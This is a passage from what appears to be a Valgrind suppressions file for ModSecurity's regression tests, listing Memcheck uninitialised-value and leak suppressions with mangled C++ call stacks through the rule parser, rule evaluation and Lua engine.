fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_rshift fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_rshift fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_rshift fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_divrem fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_divrem fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_divrem fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_mul_1 fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_mul_1 fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_divrem fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__mpn_divrem fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:hack_digit fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:__printf_fp_l fun:vfprintf fun:vsnprintf fun:_ZSt16__convert_from_vRKP15__locale_structPciPKcz fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE15_M_insert_floatIdEES3_S3_RSt8ios_baseccT_ fun:_ZNKSt7num_putIcSt19ostreambuf_iteratorIcSt11char_traitsIcEEE6do_putES3_RSt8ios_basecd fun:put fun:_ZNSo9_M_insertIdEERSoT_ fun:operator<< fun:_ZN11modsecurity7actions6RuleId4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:tolower fun:transform<__gnu_cxx::__normal_iterator >, __gnu_cxx::__normal_iterator >, int (*)(int) throw ()> fun:_ZN11modsecurity5utils6string7tolowerENSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN11modsecurity7actions5Phase4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal fun:__stoa fun:stoi fun:_ZN11modsecurity7actions5Phase4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal fun:__stoa fun:stoi fun:_ZN11modsecurity7actions5Phase4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:____strtol_l_internal fun:__stoa fun:stoi fun:_ZN11modsecurity7actions5Phase4initEPNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:_ZL21yy_get_previous_statev fun:_Z5yylexRN11modsecurity6Parser6DriverE fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Value8 fun:_itoa_word fun:vfprintf fun:vsnprintf fun:_ZN9__gnu_cxx12__to_xstringINSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEcEET_PFiPT0_mPKS8_P13__va_list_tagEmSB_z fun:to_string fun:_ZN11modsecurity4Rule8evaluateEPNS_11TransactionE fun:_ZN11modsecurity5Rules8evaluateEiPNS_11TransactionE fun:_ZN11modsecurity11Transaction18processRequestBodyEv fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Leak match-leak-kinds: definite fun:malloc fun:_Z14yy_scan_bufferPcm fun:_Z13yy_scan_bytesPKci fun:_ZN11modsecurity6Parser6Driver10scan_beginEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Leak match-leak-kinds: definite fun:_Znwm fun:_ZN2yy14seclang_parser5parseEv fun:_ZN11modsecurity6Parser6Driver5parseERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES9_ fun:_ZN11modsecurity5Rules4loadEPKcRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE fun:_Z17perform_unit_testPN16modsecurity_test15ModSecurityTestINS_14RegressionTestEEEPSt6vectorIPS1_SaIS5_EEPNS_22ModSecurityTestResultsINS_20RegressionTestResultEEEPi fun:main } { Memcheck:Leak match-leak-kinds: definite fun:realloc fun:write fun:_ZN11modsecurity6engine3Lua11blob_keeperEP9lua_StatePKvmPv obj:/usr/lib/liblua.so.5.3.4 obj:/usr/lib/liblua.so.5.3.4 obj:/usr/lib/liblua.so.5.3.4 obj:/usr/lib/liblua.so.5.3.4 